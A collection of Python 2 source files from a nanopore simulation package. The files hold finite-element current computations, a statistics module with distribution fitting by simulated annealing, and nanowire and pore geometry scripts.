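    # convective (Stokes) contributions, each averaged over the whole pore
    # and over its top/bottom sections; values are scaled by 1e12 below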
Jcomp = ["Jzdiff", "Jzdrift", "Jzstokes"]
lPore = geo.params["ltop"]+geo.params["lctr"]+geo.params["lbtm"]
Jzdiff = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.D*phys.rDPore*phys.grad(-cp+cm)[2] /lPore * geo.dx("pore")
Jzdrift = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.mu*phys.rDPore*(-cp-cm)*phys.grad(v)[2]/lPore * geo.dx("pore")
Jzstokes = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.stokesdampPore*(cp-cm)*u[2]/lPore * geo.dx("pore")
Jcomponents = [j+p for j in Jcomp for p in ["top","btm"]]
Jzdifftop = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.D*phys.rDPore*phys.grad(-cp+cm)[2] /geo.params["ltop"] * geo.dx("poretop")
Jzdrifttop = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.mu*phys.rDPore*(-cp-cm)*phys.grad(v)[2]/geo.params["ltop"] * geo.dx("poretop")
Jzstokestop = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.stokesdampPore*(cp-cm)*u[2]/geo.params["ltop"] * geo.dx("poretop")
Jzdiffbtm = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.D*phys.rDPore*phys.grad(-cp+cm)[2] /geo.params["lbtm"] * geo.dx("porebottom")
Jzdriftbtm = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.mu*phys.rDPore*(-cp-cm)*phys.grad(v)[2]/geo.params["lbtm"] * geo.dx("porebottom")
Jzstokesbtm = dolfin.Constant((1.0/phys.lscale)**2) * phys.cFarad*phys.stokesdampPore*(cp-cm)*u[2]/geo.params["lbtm"] * geo.dx("porebottom")
result = pnps.get_functionals()
for j in Jcomp+Jcomponents:
result.update({j: 1e12*dolfin.assemble(locals()[j])})
return result
```
#### File: nanopores/scripts/stokes_diffusivity.py
```python
from math import pi
k = 1.38064e-23
T = 273 + 20
eta = 1e-3
def Dstokes(r):
return k*T/(6*pi*eta*r) * 1e18
def rstokes(D):
return k*T/(6*pi*eta*D) * 1e18
# experimental data
# name : radius [nm], diffusivity [nm**2/ns]
data = {
"K+" : (0.152, 1.96),
"Na+" : (0.116, 1.33),
"Cl-" : (0.167, 2.03)
}
if __name__ == "__main__":
# some examples
s0 = "%s\nD (measured): %s\nD (Stokes): %s"
s1 = "r (measured): %s\nr (Stokes): %s\n"
for name, (r, D) in data.items():
Ds = Dstokes(r)
print s0 % (name, D, Ds)
rs = rstokes(D)
print s1 % (r, rs)
```
#### File: nanopores/tools/statistics.py
```python
import numpy as np
import matplotlib.pyplot as plt
import scipy.stats as stats
from collections import OrderedDict
class RandomVariable(object):
i = 0
parameters = {}
derived_from = []
def __init__(self, *unnamed, **named):
self.i = RandomVariable.i
RandomVariable.i += 1
self.constants = dict(self.parameters)
self.inputs = {}
self.fixed = dict.fromkeys(self.parameters.keys(), True)
self.is_derived_from = {k: (True if k in self.derived_from else False
) for k in self.parameters}
# simple fallback mechanism if unnamed variables are passed
        # (pick the first parameter name that is not explicitly passed,
# following the convention that RV names are upper- and constants are
# lower-case)
X_names = (k for k in self.parameters if (not k in named) and k.isupper())
c_names = (k for k in self.parameters if (not k in named) and k.islower())
for X in unnamed:
if isinstance(X, RandomVariable):
name = X_names.next()
named[name] = X
else:
name = c_names.next()
named[name] = X
for name, X in named.items():
if not name in self.parameters:
continue
if isinstance(X, RandomVariable):
self.inputs[name] = X
self.constants.pop(name)
if not X.is_fixed:
self.fixed[name] = False
else:
if X is not None:
self.constants[name] = X
else:
self.fixed[name] = False
self.is_fixed = all(self.fixed.values())
self.population = self.missing()
self.shape_pop = ()
def __getattr__(self, attr):
return self.params()[attr]
def params(self):
return dict(self.constants, **self.inputs)
def sample_params(self, shape, train=False):
params = {}
for name, X in self.inputs.items():
if self.is_derived_from[name]:
params[name] = X.sample_params(shape, train)
else:
params[name] = X.sample(shape, train)
for name, x in self.constants.items():
if train and name in self.population:
params[name] = self.population[name].reshape(shape[:-1] + (1,))
else:
params[name] = x
return params
def sample(self, shape=None, train=False):
"generate sample of length N"
params = self.sample_params(shape, train)
return self.sample_(shape, **params)
def pdf(self, x, N=1000, train=False, log=False, compute_std=False):
"probability density computed by taking means over input samples"
shape_p = self.shape_pop if train else ()
shape = (1,)*x.ndim + shape_p + (N,)
x = x.reshape(x.shape + (1,)*(len(shape_p) + 1))
params = self.sample_params(shape, train)
X = self.pdf_(x, **params)
factor = x[..., 0] if log else 1.
if compute_std:
self._std = factor * np.std(X, axis=-1)/np.sqrt(N)
return factor * np.mean(X, axis=-1)
def cdf(self, x, N=1000, train=False, compute_std=False):
"cdf computed by taking means over input samples"
shape_p = self.shape_pop if train else ()
shape = (1,)*x.ndim + shape_p + (N,)
x = x.reshape(x.shape + (1,)*(len(shape_p) + 1))
params = self.sample_params(shape, train)
X = self.cdf_(x, **params)
if compute_std:
self._std = np.std(X, axis=-1)/np.sqrt(N)
return np.mean(X, axis=-1)
def fit(self, sample, method="cdf", **fit_params):
fit_function = getattr(self, "fit_" + method)
return fit_function(sample, **fit_params)
def fit_cdf(self, sample, log=False, N=100, Ngrid=50, **anneal_params):
"optimize MSE on cdf with annealing."
xi = grid(sample, tail=0.005, log=log, N=Ngrid)
yi = empirical_cdf(xi, sample)[:, None]
def F(xi, yi):
fxi = self.cdf(xi, N=N, train=True)
return np.mean((fxi - yi)**2, 0)
return self.anneal(F, xi, yi, **anneal_params)
def fit_pdf(self, sample, log=False, N=100, Ngrid=50, **anneal_params):
"optimize MSE on cdf with annealing."
xi = grid(sample, tail=0.005, log=log, N=Ngrid)
xi, yi = empirical_pdf(xi, sample, log=log)
yi = yi[:, None]
def F(xi, yi):
fxi = self.pdf(xi, N=N, train=True, log=log)
return np.mean((fxi - yi)**2, 0)
return self.anneal(F, xi, yi, **anneal_params)
def anneal(self, F, xi, yi, n_pop=100, tol=1e-3, n_it=20, sigma=5., factor=0.5,
verbose=True):
"minimize loss function F(xi, yi; p) wrt p with simulated annealing"
# n_pop = size of population in one iteration
        # n_it = number of iterations (recomputed below from tol, sigma, factor)
# sigma = initial (multiplicative) standard deviation
# factor = factor to reduce sigma per iteration
# calculate number of iterations necessary to have sigma*factor**n <= tol
n_it = int(np.ceil((np.log(tol) - np.log(sigma))/np.log(factor)))
if verbose:
t = self.recursive_missing()
print " ".join(map(lambda t: "%s%d" % t[::2], t))
print " ".join(map(lambda t: "%.2f" % t[1], t))
for k in range(n_it):
# create new population by adding multiplicative gaussian noise
self.spawn_population_lognormal(n_pop=n_pop, sigma=sigma)
# compute loss
f = F(xi, yi)
# replace p by new best guess
self.update_from_population(np.argmin(f))
# update sigma
sigma *= factor
# print params
if verbose:
print " ".join(map(lambda t: "%.2g" % t[1],
self.recursive_missing()))
if verbose:
print "stopped after %d iterations" % n_it
print "minimum", min(f)
return min(f) #self.recursive_missing()
def fit_naive(self, sample):
params = self.fit_(sample)
        update = {k: params[k] for k in params if k in self.fixed and not self.fixed[k]}
        self.update(**update)
for k in self.inputs:
if k in update:
sample = np.array([update[k]])
self.inputs[k].fit_naive(sample)
def missing(self):
return {k: v for k, v in self.constants.items() if not self.fixed[k]}
def fix(self):
self.fixed = dict.fromkeys(self.fixed.keys(), True)
self.is_fixed = True
for X in self.inputs.values():
X.fix()
def update(self, **params):
for k in params:
if k in self.constants:
self.constants[k] = params[k]
def update_from_population(self, i):
"set constants to i-th value of population"
self.update(**{k: v[i] for k, v in self.population.items()})
for X in self.inputs.values():
if not X.is_fixed:
X.update_from_population(i)
def set_population(self, **params):
first = params.values()[0]
if np.isscalar(first):
self.shape_pop = ()
assert all(np.isscalar(p) for p in params.values())
else:
self.shape_pop = first.shape
assert all(p.shape == self.shape_pop for p in params.values())
missing = self.missing()
self.population = {k: params[k] for k in params if k in missing}
def spawn_population_lognormal(self, n_pop=100, sigma=5.):
# TODO: in principle, uncertain parameters could be RVs themselves
# then one would have either to discriminate two kinds of inputs
# or collapse sampling and population spawning
self.shape_pop = (n_pop,)
self.population = {}
for k in self.missing():
c = self.constants[k]
self.population[k] = c * np.exp(np.random.randn(n_pop)*sigma)
for X in self.inputs.values():
if not X.is_fixed:
X.spawn_population_lognormal(n_pop, sigma)
# the following 3 should be overloaded to specify model:
def sample_(self, shape, **params):
return np.random.random(shape)
# default behaviour is to construct empirical dfs from sample
#def pdf_(self, t, K, tau):
# return stats.gamma.pdf(t, K, scale=tau)
def __repr__(self):
name = type(self).__name__
params = self.constants.items() + self.inputs.items()
params = ", ".join(["%s=%s" % item for item in params])
return "%s(%s)" % (name, params)
def __mul__(self, t): # t * self
if isinstance(t, RandomVariable):
return Product(X=self, Y=t)
else:
return ScalarMultiple(t=t, X=self)
def __rmul__(self, t): # self * t
return self.__mul__(t)
def recursive_params(self):
        # return (name, value, RV index) triples; the index disambiguates
        # parameters with the same name belonging to different RVs
params = [(k, v, self.i) for k, v in self.constants.items()]
for X in self.inputs.values():
params.extend(X.recursive_params())
return params
def recursive_missing(self):
params = [(k, v, self.i) for k, v in self.missing().items()]
for X in self.inputs.values():
params.extend(X.recursive_missing())
return params
def print_params(self):
print ", ".join([
"%s=%s (%d)" % item for item in self.recursive_params()])
def plot_cdf(self, x, *args, **kwargs):
std = True if not "std" in kwargs else kwargs.pop("std")
fx = self.cdf(x, N=1000, compute_std=std)
line, = plt.plot(x, fx, *args, **kwargs)
if std:
itv = 2*self._std
plt.fill_between(x, fx - itv, fx + itv,
color=line.get_color(), alpha=0.2)
def plot_pdf(self, x, *args, **kwargs):
log = False if not "log" in kwargs else kwargs.pop("log")
std = True if not "std" in kwargs else kwargs.pop("std")
# plot at centers for compatibility with hist
x = .5*(x[1:] + x[:-1])
fx = self.pdf(x, N=1000, compute_std=std, log=log)
line, = plt.plot(x, fx, *args, **kwargs)
if std:
itv = 2*self._std
plt.fill_between(x, fx - itv, fx + itv,
color=line.get_color(), alpha=0.2)
def compare_cdfs(self, sample, log=True):
t = grid(sample, 20, 0.005, log=log)
tt = grid(sample, 100, 0.005, log=log)
plt.plot(t, empirical_cdf(t, sample), "o")
self.plot_cdf(tt)
if log:
plt.xscale("log")
def compare_pdfs(self, sample, log=True):
t = grid(sample, 20, 0.005, log=log)
tt = grid(sample, 100, 0.005, log=log)
t, epdf = empirical_pdf(t, sample, log=log)
plt.plot(t, epdf, "o")
self.plot_pdf(tt, log=log)
if log:
plt.xscale("log")
def empirical_cdf(x, data):
"evaluate edcf of data at points x, i.e. np.mean(data < x) for all x"
data = np.sort(data)
return np.searchsorted(data, x)/float(data.size)
def empirical_pdf(x, data, log=False):
"evaluate epdf at bin centers by creating normed histogram"
p, _ = np.histogram(data, bins=x)
mass = np.dot(np.diff(np.log(x)), p) if log else np.dot(np.diff(x), p)
x = .5*(x[1:] + x[:-1])
return x, p/mass
def empirical_cdf_vec(x, data):
# x and data just have to be broadcastable, sampling dimension is last
return np.mean(data <= x, axis=-1)
def grid(data, N=100, tail=0.01, log=False, xmin=None, xmax=None):
"regularly spaced evaluation nodes spanning data distribution"
data = np.sort(data)
n = data.size
    # set limits near tail ends on both sides (unless given explicitly)
    if xmin is None:
        xmin = data[int(np.floor(tail*n))]
    if xmax is None:
        xmax = data[int(np.ceil((1.-tail)*n))-1]
if log:
return np.logspace(np.log10(xmin), np.log10(xmax), N)
else:
return np.linspace(xmin, xmax, N)
####### commonly used RVs #########
class Constant(RandomVariable):
parameters = dict(c=1.)
def sample_(self, shape, c):
return np.full(shape, c)
class Empirical(RandomVariable):
def __init__(self, data):
self.data = data
RandomVariable.__init__(self)
def sample_(self, shape):
return np.random.choice(self.data, size=shape)
def cdf_(self, x):
return empirical_cdf(x, self.data)
class Bernoulli(RandomVariable):
parameters = dict(p=.5)
def sample_(self, shape, p):
return stats.bernoulli.rvs(p, size=shape)
#class Categorical(RandomVariable):
# """generalization of Bernoulli variable, output is integer 0,...,n-1 with
# resp. probability p_0,...,p_n-1. n is no parameter, but fixed at
# instantiation by the length of the probabilities vector."""
#
# # TODO: maybe have to initialize .parameters
# def __init__(self, *p):
# self.n = len(p)
# keys = ["p%d" % i for i in range(self.n)]
# params = dict(zip(keys, p))
# RandomVariable.__init__(self, **params)
#
# def prob(self, pdict):
# "return sorted and normalized probabilities from dict"
# p = np.array([x for _, x in sorted(pdict.items())])
# return p/np.sum(p, axis=0)[None, ...]
#
# # FIXME: does not work for vector-valued probabilities
# def sample_(self, shape, **p):
# return np.random.choice(self.n, size=shape, p=self.prob(p))
class Poisson(RandomVariable):
parameters = dict(a=1.)
def sample_(self, shape, a):
return np.random.poisson(a, shape)
def pdf_(self, x, a):
return stats.poisson.pmf(x, a)
def cdf_(self, x, a):
return stats.poisson.cdf(x, a)
def broadcast_mask(M):
"broadcast boolean mask to index possibly larger array"
colon = slice(None)
return tuple(i if d > 1 else colon for d, i in zip(M.shape, M.nonzero()))
class ZeroTruncatedPoisson(RandomVariable):
"Poisson conditioned on K > 0"
parameters = dict(a=1.)
def sample_(self, shape, a):
if np.isscalar(a) or a.size == 1:
return self.sample_scalar(shape, a)
#print shape, a.shape
AMAX = 30
k = 1
K = np.full(shape, k)
# for large a values, just use non-truncated poisson
large = broadcast_mask(a > AMAX)
small = broadcast_mask(a <= AMAX)
K[large] = np.random.poisson(a[large], K[large].shape)
Ksmall = K[small]
a = a[small]
# actual algorithm begins here
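        # inverse-transform sampling: s = P(K = k | K > 0), S accumulates the
        # truncated cdf; samples whose uniform U still exceeds S get their
        # count k incremented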
s = a/np.expm1(a)
S = s
U = np.random.random(Ksmall.shape)
new = S < U
while np.any(new):
k += 1
Ksmall[new] = k
s = s*a/float(k)
S = S + s
new = S < U
K[small] = Ksmall
return K
def sample_scalar(self, shape, a):
AMAX = 30
if a > AMAX:
return np.random.poisson(a, shape)
k = 1
K = np.full(shape, k)
s = a/np.expm1(a)
S = s
U = np.random.random(shape)
new = S < U
while np.any(new):
k += 1
K[new] = k
s = s*a/float(k)
S = S + s
new = S < U
return K
def pdf_(self, x, a):
return stats.poisson.pmf(x, a)*np.exp(a)/np.expm1(a)
    def cdf_(self, x, a):
        # P(K <= x | K > 0) = (F(x) - exp(-a))/(1 - exp(-a))
        return np.maximum(stats.poisson.cdf(x, a) - np.exp(-a), 0.)/(-np.expm1(-a))
# TODO:
# def fit_(self, data):
# a0 = np.mean(data)
# # solve a0 = a/(1-exp(-a)) for a
# return dict(a=a)
class Exponential(RandomVariable):
parameters = dict(tau=1.)
def sample_(self, shape, tau):
return np.random.exponential(scale=tau, size=shape)
def pdf_(self, t, tau):
return stats.expon.pdf(t, scale=tau)
def cdf_(self, t, tau):
return stats.expon.cdf(t, scale=tau)
def fit_(self, data):
return dict(tau=data.mean())
class LeftTruncatedExponential(RandomVariable):
parameters = dict(tau=1., tmin=0.1)
def sample_(self, shape, tau, tmin):
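        # inverse-transform sampling restricted to t > tmin:
        # draw U ~ Uniform(0, exp(-tmin/tau)) and set t = -tau*log(U)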
umax = np.exp(-tmin/tau)
u = umax * np.random.random(size=shape)
return -tau * np.log(u)
def pdf_(self, t, tau, tmin):
return np.exp(-(t-tmin)/tau)/tau * (1.*(t > tmin))
def cdf_(self, t, tau, tmin):
return 1. - np.exp(-np.maximum(t - tmin, 0.)/tau)
class Gamma(RandomVariable):
parameters = dict(K=1, tau=1.)
def sample_(self, shape, K, tau):
return np.random.gamma(K, scale=tau, size=shape)
def pdf_(self, t, K, tau):
return stats.gamma.pdf(t, K, scale=tau)
def cdf_(self, t, K, tau):
return stats.gamma.cdf(t, K, scale=tau)
def fit_(self, data):
K, _, tau = stats.gamma.fit(data)
return dict(K=K, tau=tau)
####### RVs derived from others #########
class ScalarMultiple(RandomVariable):
"implement t*X where X is a RandomVariable and t > 0"
parameters = dict(t=1., X=1.)
derived_from = ["X"]
def sample_(self, shape, t, X):
x = self.inputs["X"].sample_(shape, **X)
return t*x
def pdf_(self, x, t, X):
return self.inputs["X"].pdf_(x/t, **X)/t
def cdf_(self, x, t, X):
return self.inputs["X"].cdf_(x/t, **X)
def __repr__(self):
return "%.2g*%s" % (self.constants["t"], repr(self.inputs["X"]))
class Product(RandomVariable):
"product of two RVs. can only sample."
parameters = dict(X=1., Y=1.)
derived_from = ["X", "Y"]
def sample_(self, shape, X, Y):
x = self.X.sample_(shape, **X)
y = self.Y.sample_(shape, **Y)
return x * y
class Function(RandomVariable):
"arbitrary, fixed function of one RV. can only sample."
parameters = dict(X=1.)
derived_from = ["X"]
def __init__(self, f, X):
# f has to act point-wise on arrays of arbitrary shape
self.f = f
RandomVariable.__init__(self, X=X)
def sample_(self, shape, X):
x = self.X.sample_(shape, **X)
return self.f(x)
class OneOf(RandomVariable):
"""RV is one of X, Y where X is w times more likely than Y.
In other words, [X, Y][i] where i ~ Bernoulli(1/(1+w))"""
# fitting is biased to X being more likely, to get a unique order
parameters = OrderedDict([("X", 1.), ("Y", 1.), ("w", 5.)])
derived_from = ["X", "Y"]
def sample_(self, shape, X, Y, w):
x = self.X.sample_(shape, **X)
y = self.Y.sample_(shape, **Y)
chose_y = np.bool_(stats.bernoulli.rvs(1./(1. + w), size=shape))
x[chose_y] = y[chose_y]
return x
def pdf_(self, x, X, Y, w):
p = 1./(1. + w)
return (1. - p)*self.X.pdf_(x, **X) + p*self.Y.pdf_(x, **Y)
def cdf_(self, x, X, Y, w):
p = 1./(1. + w)
return (1. - p)*self.X.cdf_(x, **X) + p*self.Y.cdf_(x, **Y)
class TruncateLeft(RandomVariable):
"RV conditioned on X > xmin"
parameters = dict(X=1., xmin=0.1)
derived_from = ["X"]
def sample_(self, shape, X, xmin):
# TODO
pass
def pdf_(self, x, X, xmin):
mass = (1. - self.X.cdf_(xmin, **X)) + 1e-10
return self.X.pdf_(x, **X) * (1.*(x > xmin))/mass
def cdf_(self, x, X, xmin):
Fx = self.X.cdf_(x, **X)
Fxmin = self.X.cdf_(xmin, **X)
mass = (1. - Fxmin) + 1e-10
return np.maximum((Fx - Fxmin)/mass, 0.)
def DoubleExponential(tau1=1., tau2=1., w=None):
#w = p/(1.-p) if p is not None else None
X = Exponential(tau=tau1)
Y = Exponential(tau=tau2)
return OneOf(X=X, Y=Y, w=w)
def LeftTruncatedDoubleExponential(tau1=1., tau2=1., w=None, tmin=0.5):
#w = p/(1.-p) if p is not None else None
X = LeftTruncatedExponential(tau=tau1, tmin=tmin)
Y = LeftTruncatedExponential(tau=tau2, tmin=tmin)
return OneOf(X=X, Y=Y, w=w)
def LeftTruncatedGamma(K=1., tau=1., tmin=0.1):
X = Gamma(K=K, tau=tau)
return TruncateLeft(X=X, xmin=tmin)
def LeftTruncatedDoubleGammaPoisson(a1=1., tau1=1., a2=1., tau2=1., tmin=0.1, w=None):
K1 = ZeroTruncatedPoisson(a=a1)
K2 = ZeroTruncatedPoisson(a=a2)
T1 = LeftTruncatedGamma(K=K1, tau=tau1, tmin=tmin)
T2 = LeftTruncatedGamma(K=K2, tau=tau2, tmin=tmin)
return OneOf(X=T1, Y=T2, w=w)
if __name__ == "__main__":
# decide which example to run
example1 = False
example2 = False
example3 = True
if example1: # example with stacked Gamma-Poisson-Distributions
# construct target distribution
K = ZeroTruncatedPoisson(a=20.) # Assigning a constant means fixing the parameter
Ta = Gamma(K=K, tau=0.005) # An RV as parameter generates a compound distr.
N = ZeroTruncatedPoisson(a=100.*Ta) # RVs can be multiplied by scalar
T = 1e-3*Gamma(K=N)
# get samples
sample1 = Ta.sample(1000)
sample = T.sample(1000)
# construct fitting distribution
K = ZeroTruncatedPoisson(a=None) # None means it will be fitted
Ta = Gamma(K=K, tau=None)
N = ZeroTruncatedPoisson(a=None*Ta)
N.a.constants["t"] = 50. # intiial guess t=1. would not work
T = None*Gamma(K=N)
# fitting methods
method = "pdf" # or "cdf"; pdf seems to be more robust for large data,
# cdf is obviously better for small data because it is smoother
log = True # True should yield better fits for exponential-type distributions
# first fit Ta and fix parameters, then fit T
Ta.fit(sample1, method=method, log=log)
Ta.fix()
T.fit(sample, method=method, log=log)
# alternatively, simply treat Ta as coming from a fixed empirical dist.
Ta_alt = Empirical(sample1)
N_alt = ZeroTruncatedPoisson(a=None*Ta_alt)
T_alt = None*Gamma(K=N_alt)
T_alt.fit(sample, method=method, log=log)
# alternatively, just fit an Exponential
T_exp = None*Exponential()
T_exp.fit(sample, method=method, log=log)
# plot fitted cdf vs. empirical cdf from sample
tt = grid(sample, 100, 0.005, log=True)
plt.figure("cdf")
Ta.compare_cdfs(sample1, log=True)
T.compare_cdfs(sample, log=True)
T_alt.plot_cdf(tt, ":k")
T_exp.plot_cdf(tt, "--b")
plt.figure("pdf")
Ta.compare_pdfs(sample1, log=True)
T.compare_pdfs(sample, log=True)
T_alt.plot_pdf(tt, ":k", log=True)
T_exp.plot_pdf(tt, "--b", log=True)
print "\nT", T
print "\nT_alt", T_alt
print "\nT_exp", T_exp
if example2: # combinations of Exponential variables
tmin = 0.005
sample = LeftTruncatedDoubleExponential(
tau1=0.01, tau2=1., w=1., tmin=tmin).sample(10000)
T = LeftTruncatedDoubleExponential(
tau1=None, tau2=None, w=None, tmin=tmin)
T.fit(sample, method="cdf", log=True, sigma=2., factor=0.6)
plt.figure("cdf")
T.compare_cdfs(sample, log=True)
plt.figure("pdf")
T.compare_pdfs(sample, log=True)
print T
if example3: # Double Gamma example where variables are interlinked
sample = DoubleExponential(tau1=0.01, tau2=1., w=2.).sample(10000)
a1 = Constant(c=None)
a2 = .005
w = Function(lambda x: x/a2, a1)
K1 = ZeroTruncatedPoisson(a=a1)
K2 = ZeroTruncatedPoisson(a=a2)
T1 = Gamma(K=K1, tau=None)
T1.update(tau=0.0001)
T2 = Gamma(K=K2, tau=None)
T = OneOf(X=T1, Y=T2, w=w)
T.fit(sample, log=True, sigma=2., factor=0.7)
T.compare_pdfs(sample, log=True)
```
#### File: scripts/finfet/test_wire.py
```python
from nanopores import generate_mesh, geo_from_name, Poisson, PoissonProblem, qq, PB, PBProblem, import_vars, params_physical, get_mesh, u_to_matlab, IllposedNonlinearSolver
from dolfin import *
from random import random
t = Timer("time")
geo_name = "Nanowire"
globals().update(import_vars("nanopores.%s.params_geo" % geo_name))
def random_dopant_positions(N, **params):
# create N random points in unit cube
x = [[random() for i in range(3)] for i in range(N)]
# affine transformation on transducer
rr = params["r_eff"]
ll = params["l"]
T = lambda x : [x[0]*(w_core - 2*rr) + x_core + rr, x[1]*(ll - 2*rr) + rr,
x[2]*(h_core - 2*rr) + z_core + rr]
return map(T, x)
N = 5 # number of impurity atoms in pore
l = 10 # length of wire [nm]
clscale = 1.0 # mesh width scale
Nsamples = 1 # number of samples
r_eff = 3 # effective radius [nm]
voltage = -3 # voltage drop across 1000 nm wire [V]
# change physical parameters
#params_physical.permanent_charge["impurity"] = 1e6
#params_physical.permittivity["impurity"] = ???
#params_physical.ion_concentration["impurity"] = ???
geo_params = dict(l = l*1e-9, r_eff = r_eff*1e-9, lc = 10e-9)
generate_mesh(clscale, geo_name, **geo_params) # constructs the mesh
mesh = get_mesh(geo_name)
print "CPU Time (mesh generation):",t.stop()
print "Number of cells:",mesh.num_cells()
PB.adapt = PB.rebuild
PB.maxcells = 5000000
PB.marking_fraction = 0.9
PB.tolnewton = 1e-5
#IllposedNonlinearSolver.newtondamp = 0.9
u0 = Function(PBProblem.space(mesh))
for k in range(Nsamples):
print "\n --- Sample %d of %d" %(k+1, Nsamples)
# xi = list of dopant positions
xi = random_dopant_positions(N, **geo_params)
geo = geo_from_name(geo_name, mesh=mesh, check_midpoint=True, xi=xi, **geo_params)
t.start()
pde = PB(geo, bV=-1.0)
#rho = geo.pwconst("permanent_charge")
#pde = Poisson(geo, bV=-0.0, f=rho)
pde.solve(refinement = False)
print "CPU Time (solving):",t.stop()
(u,) = pde.solutions()
u0.vector()[:] = u0.vector()[:] + u.vector()[:]/Nsamples
#mesh_core = geo.submesh("core")
#geo_core = geo_from_name("Nanowire", mesh=mesh_core, check_midpoint=True, xi=xi, **geo_params)
#plot(geo_core.boundaries)
# compute current
from nanopores.physics.params_physical import UT, qq
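# crude drift-current estimate: carrier densities follow Boltzmann statistics
# relative to the Fermi level, the current density is q*(mu_p*p + mu_n*n)*E
# with a constant axial field E, integrated over the wire core and divided by
# the wire length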
ni = 1e16
mup = 100*1e4
mun = 1000*1e4
phiF = params_physical.fermi_level["sil"]
E = -voltage/1000e-9
dx = geo.dx("core")
p = ni*exp(-(u0 - phiF)/UT)
n = ni*exp((u0 - phiF)/UT)
Jp = qq*mup*p*E
Jn = qq*mun*n*E
j0 = Jp + Jn
I = assemble(j0*dx)/l
print "current: ", I
#j1 = Constant(qq*E*ni/l)*(mup*exp(-(u0 - phiF)/UT) + mun*exp((u0 - phiF)/UT))
#I1 = assemble(j1*dx)
#u_to_matlab(mesh, u0, "potential")
#plot(u, title="example potential")
plot(u0, title="average potential")
#pde.functions["PBProblem"] = u0
#pde.visualize("core")
interactive()
```
#### File: scripts/howorka/interpolation_points.py
```python
"create 2D point set for Howorka model where force shall be evaluated."
import numpy as np
from itertools import product
import math
import matplotlib.pyplot as plt
import nanopores
gauss = np.polynomial.legendre.leggauss
nanopores.add_params(
h = 0.5,
hout = 1.,
Ry = 10.,
Rx = 3.,
)
def points(h, hout, r0, r, l0, Rx, Ry):
# effective pore radius for molecule
R = r0 - r
# get scaled 1D gauss quadrature nodes
# for x grid inside pore
# this has h = h/2 to resolve the thin region
k = int(math.ceil(R/h*2.))
x, w = gauss(2*k + 1)
x = R*x[k:]
# get uniform y grid inside pore
m = int(math.ceil(2.*l0/h))
y = np.linspace(-l0-r+h/2, l0+r-h/2, m)
# list of (x,y) values in pore
Xpore = list(product(x, y))
# gauss x grid outside
l = int(math.ceil(Rx/h))
x, w = gauss(2*l)
x = Rx-Rx*x[l:]
#x = np.linspace(0., Rx, l)
# gauss y grid outside
L = (Ry-l0-r)
n = int(math.ceil(L/hout))
y, w = gauss(2*n)
yp = l0+r + L + L*y[:n]
ym = -yp
Xtop = list(product(x, yp))
Xbot = list(product(x, ym))
# combine
X = Xtop + Xpore + Xbot
return X
# TODO: more points at edge y=l0 in x=0,r0 ?
# load parameters and create points
from nanopores.tools import fields
from nanopores.geometries.H_cyl_geo.params_geo import r0, rMolecule, l0, r1
X = points(h, hout, r0, rMolecule, l0/2, r1 + rMolecule, Ry)
x, y = [z[0] for z in X], [z[1] for z in X]
plt.scatter(x, y)
plt.show()
#fields.save_entries("xforce", PARAMS, X=X, N=len(X))
#print "Created and stored %d evaluation points." %(len(X),)
#fields.update()
```
#### File: scripts/howorka/plot_selectivity_old.py
```python
import nanopores, numpy
import matplotlib.pyplot as plt
Qs = [-1.,-3.]
NAME = "howorka2D_selectivity_Q%.0f"
label = r"$Q = %.0f$"
def avg(J):
n = len(J)
    J0 = list(numpy.array(J)[int(n*0.2):int(n*0.5)])
return sum(J0)/len(J0)
Javg = []
for Q in Qs:
results, params = nanopores.load_stuff(NAME % Q)
t = results["time"]
J = results["current"]
rel = results["release"]
plt.figure(0)
plt.semilogx(t, rel, "x-", label=label % Q)
plt.xlabel("time [s]")
plt.ylabel("% release")
plt.title("reservoir size: %.0f nm" % (params["Ry"],))
plt.ylim(ymin=0.)
plt.figure(1)
plt.semilogx(t, J, "x-", label=label % Q)
plt.xlabel("time [s]")
plt.ylabel("current through pore [1/ms]")
plt.ylim(ymin=0.)
# determine average current
Javg.append(avg(J))
plt.plot(t, [Javg[-1]]*len(t), "k--", label="%.1f" % Javg[-1])
plt.title("selectivity: %.1f / %.1f = %.1f" % (
max(Javg), min(Javg), max(Javg)/min(Javg)))
plt.figure(0)
plt.legend(loc="best")
plt.figure(1)
#plt.plot(t, [0.]*len(t), "k-")
plt.legend(loc="best")
plt.show()
```
#### File: scripts/numerics/analyticalPNPS_uncoupled_2D.py
```python
" analytical test problem to validate 2D and 3D solvers "
import math
from dolfin import *
from nanopores import *
from nanopores.physics.simplepnps import *
# --- define parameters ---
bV = -0.05 # [V]
rho = -0.025 # [C/m**2]
initialh = .1
Nmax = 1e4
# --- create 2D geometry ---
Rz = 2. # [nm] length in z direction of channel part
R = 2. # [nm] pore radius
hcross = .2
domain2D = Box([0., -Rz], [R, Rz])
cross = Box([0., 0.], [R, hcross])
domain2D.addsubdomains(
main = domain2D - cross,
cross = cross,
)
domain2D.addboundaries(
lowerb = domain2D.boundary("bottom"),
upperb = domain2D.boundary("top"),
wall = domain2D.boundary("right"),
cross = cross.boundary("bottom"),
center = domain2D.boundary("left")
)
domain2D.params["lscale"] = 1e9
domain2D.synonymes = dict(
fluid = {"main", "cross"},
pore = "fluid",
chargedmembraneb = "wall",
noslip = "wall",
nopressure = "center",
bulk = {"upperb", "lowerb"},
#nocbc = {"lowerb"},
)
geo2D = domain2D.create_geometry(lc=initialh)
#mesh = geo2D.mesh
#boundary = MeshFunction("size_t", mesh, 1)
#boundary.set_all(0)
#DomainBoundary().mark(boundary, 2)
#plot(boundary)
#domain2D.plot()
# --- create geometry for 1D crossection ---
# TODO: it would be cool if the 1D domain could be extracted from the 2D one
# (should be pretty easy)
domain1D = Interval(0., R)
domain1D.addsubdomain(domain1D, "fluid")
domain1D.addboundaries(
wall = domain1D.boundary("right"),
center = domain1D.boundary("left")
)
domain1D.params["lscale"] = 1e9
domain1D.synonymes = dict(
pore = "fluid",
chargedmembraneb = "wall",
)
geo1D = domain1D.create_geometry(lc=.001)
# --- define physical parameters for 1D problem ---
phys_params = dict(
Membraneqs = rho,
bulkcon = 300,
v0 = {}
)
phys = Physics("pore", geo1D, **phys_params)
